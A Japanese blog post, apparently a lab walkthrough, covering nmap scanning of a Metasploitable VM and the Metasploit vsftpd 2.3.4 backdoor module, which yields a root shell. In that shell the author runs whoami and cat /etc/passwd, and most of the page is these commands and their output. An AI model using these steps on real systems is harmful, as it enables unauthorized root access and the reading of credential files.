Blog

【Kali】vsftpdのバックドアから侵入する

未分類

Posted by:

2021年11月17日
no comments yet

＜スポンサーリンク＞

準備

metaspolitableをインストール
- msfadmin/msfadmin
- HostOnlyAdapter

Nmap

192.168.56.115がmetaspolitable

└─# nmap -sP 192.168.56.0/24
Starting Nmap 7.92 ( &lt;https://nmap.org&gt; ) at 2021-11-17 03:23 JST
Nmap scan report for CARMILLA (192.168.56.1)
Host is up (0.00053s latency).
Nmap scan report for 192.168.56.100
Host is up (0.00038s latency).
Nmap scan report for 192.168.56.115
Host is up (0.0015s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.85 seconds

└─# nmap -sP 192.168.56.0/24

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-17 03:23 JST

Nmap scan report for CARMILLA (192.168.56.1)

Host is up (0.00053s latency).

Nmap scan report for 192.168.56.100

Host is up (0.00038s latency).

Nmap scan report for 192.168.56.115

Host is up (0.0015s latency).

Nmap done: 256 IP addresses (3 hosts up) scanned in 6.85 seconds

PortScan

怪しい

vsftpd2.3.4
- Backdoor Command Executionという脆弱性あり
- :)を含むユーザー名でアクセスするとPort6200が開放される
- 6200にアクセスすることでvsftpdの実行権限で任意コマンドを実行できる
- https://www.exploit-db.com/
  - vsftpd_234_backdoort
smbd

└─# nmap -sV -O -p- 192.168.56.115
Starting Nmap 7.92 ( &lt;https://nmap.org&gt; ) at 2021-11-17 03:25 JST
Stats: 0:02:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.56.115
Host is up (0.00100s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  shell       Netkit rshd
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36402/tcp open  mountd      1-3 (RPC #100005)
56312/tcp open  status      1 (RPC #100024)
58408/tcp open  nlockmgr    1-4 (RPC #100021)
60433/tcp open  java-rmi    GNU Classpath grmiregistry
No exact OS matches for host (If you know what OS is running on it, see &lt;https://nmap.org/submit/&gt; ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/17%OT=21%CT=1%CU=35539%PV=Y%DS=2%DC=I%G=Y%TM=6193F8
OS:2C%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=7)OPS(
OS:O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST11
OS:NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
OS:R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=3DAE%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at &lt;https://nmap.org/submit/&gt; .
Nmap done: 1 IP address (1 host up) scanned in 143.66 seconds

└─# nmap -sV -O -p- 192.168.56.115

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-17 03:25 JST

Stats: 0:02:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan

NSE Timing: About 0.00% done

Nmap scan report for 192.168.56.115

Host is up (0.00100s latency).

Not shown: 65505 closed tcp ports (reset)

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.3.4

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp open telnet Linux telnetd

25/tcp open smtp Postfix smtpd

53/tcp open domain ISC BIND 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

512/tcp open exec netkit-rsh rexecd

513/tcp open login OpenBSD or Solaris rlogind

514/tcp open shell Netkit rshd

1099/tcp open java-rmi GNU Classpath grmiregistry

1524/tcp open bindshell Metasploitable root shell

2049/tcp open nfs 2-4 (RPC #100003)

2121/tcp open ftp ProFTPD 1.3.1

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp open vnc VNC (protocol 3.3)

6000/tcp open X11 (access denied)

6667/tcp open irc UnrealIRCd

6697/tcp open irc UnrealIRCd

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

36402/tcp open mountd 1-3 (RPC #100005)

56312/tcp open status 1 (RPC #100024)

58408/tcp open nlockmgr 1-4 (RPC #100021)

60433/tcp open java-rmi GNU Classpath grmiregistry

No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).

TCP/IP fingerprint:

OS:SCAN(V=7.92%E=4%D=11/17%OT=21%CT=1%CU=35539%PV=Y%DS=2%DC=I%G=Y%TM=6193F8

OS:2C%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=7)OPS(

OS:O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST11

OS:NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(

OS:R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS

OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%RD=0

OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z

OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y

OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI

OS:PL=G%RID=G%RIPCK=G%RUCK=3DAE%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .

Nmap done: 1 IP address (1 host up) scanned in 143.66 seconds

バックドア侵入

# 起動
msfconsole

# ツール指定
msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt;

# サーバ指定
msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOST 192.168.56.115
RHOST =&gt; 192.168.56.115

# オプション表示
msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.56.115   yes       The target host(s), see &lt;https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit&gt;
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

# 侵入
msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; exploit

[*] 192.168.56.115:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.115:21 - USER: 331 Please specify the password.
[+] 192.168.56.115:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.115:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.23.97.52:46453 -&gt; 192.168.56.115:6200 ) at 2021-11-17 03:35:58 +0900

# 任意コマンドを実行
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

# 起動

msfconsole

# ツール指定

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

[*] No payload configured, defaulting to cmd/unix/interact

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

# サーバ指定

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.56.115

RHOST => 192.168.56.115

# オプション表示

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS 192.168.56.115 yes The target host(s), see <https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit>

RPORT 21 yes The target port (TCP)

Payload options (cmd/unix/interact):

Name Current Setting Required Description

---- --------------- -------- -----------

Exploit target:

Id Name

-- ----

0 Automatic

# 侵入

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.56.115:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 192.168.56.115:21 - USER: 331 Please specify the password.

[+] 192.168.56.115:21 - Backdoor service has been spawned, handling...

[+] 192.168.56.115:21 - UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (172.23.97.52:46453 -> 192.168.56.115:6200 ) at 2021-11-17 03:35:58 +0900

# 任意コマンドを実行

whoami

root

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

dhcp:x:101:102::/nonexistent:/bin/false

syslog:x:102:103::/home/syslog:/bin/false

klog:x:103:104::/home/klog:/bin/false

sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

bind:x:105:113::/var/cache/bind:/bin/false

postfix:x:106:115::/var/spool/postfix:/bin/false

ftp:x:107:65534::/home/ftp:/bin/false

postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false

tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false

distccd:x:111:65534::/:/bin/false

user:x:1001:1001:just a user,111,,:/home/user:/bin/bash

service:x:1002:1002:,,,:/home/service:/bin/bash

telnetd:x:112:120::/nonexistent:/bin/false

proftpd:x:113:65534::/var/run/proftpd:/bin/false

statd:x:114:65534::/var/lib/nfs:/bin/false

参考

https://qiita.com/y-araki-qiita/items/b5e345984d8a076145c8

＜スポンサーリンク＞

Blog

【Kali】vsftpdのバックドアから侵入する

準備

Nmap

PortScan

バックドア侵入

参考

コメントを残すコメントをキャンセル

最近の投稿

カテゴリー

最近のコメント

メタ情報

Blog

【Kali】vsftpdのバックドアから侵入する

準備

Nmap

PortScan

バックドア侵入

参考

コメントを残す コメントをキャンセル

最近の投稿

カテゴリー

最近のコメント

メタ情報

コメントを残すコメントをキャンセル